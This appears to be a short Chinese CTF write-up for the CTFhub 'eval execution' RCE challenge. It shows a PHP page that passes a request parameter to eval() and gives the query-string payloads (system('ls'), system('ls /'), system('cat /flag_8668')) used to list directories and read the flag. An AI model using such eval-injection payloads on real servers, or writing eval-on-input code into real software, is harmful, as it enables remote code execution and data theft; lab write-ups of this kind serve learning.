CTFhub-RCE-evel执行

访问目标地址:

<?php

if (isset($_REQUEST['cmd'])) {

eval($_REQUEST["cmd"]);

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
OtIo TALL4 小时前
redis7 for windows的安装教程
java
uNke DEPH4 小时前
Spring Boot的项目结构
java·spring boot·后端
xixingzhe25 小时前
idea启动vue项目
java·vue.js·intellij-idea
超级无敌暴龙兽5 小时前
和我一起刷面试题呀
前端·面试
wzl202612135 小时前
企业微信定时群发技术实现与实操指南(原生接口+工具落地)
java·运维·前端·企业微信
小码哥_常5 小时前
Robots.txt:互联网爬虫世界的“隐形规则”
前端
凌波粒5 小时前
Java 8 “新”特性详解:Lambda、函数式接口、Stream、Optional 与方法引用
java·开发语言·idea
曹牧5 小时前
Eclipse:悬停提示(Hover)
java·ide·eclipse
小码哥_常5 小时前
Android开发神器:AndroidAutoSize,轻松搞定屏幕适配
前端
前端一小卒5 小时前
前端工程师的全栈焦虑,我用 60 天治好了
前端·javascript·后端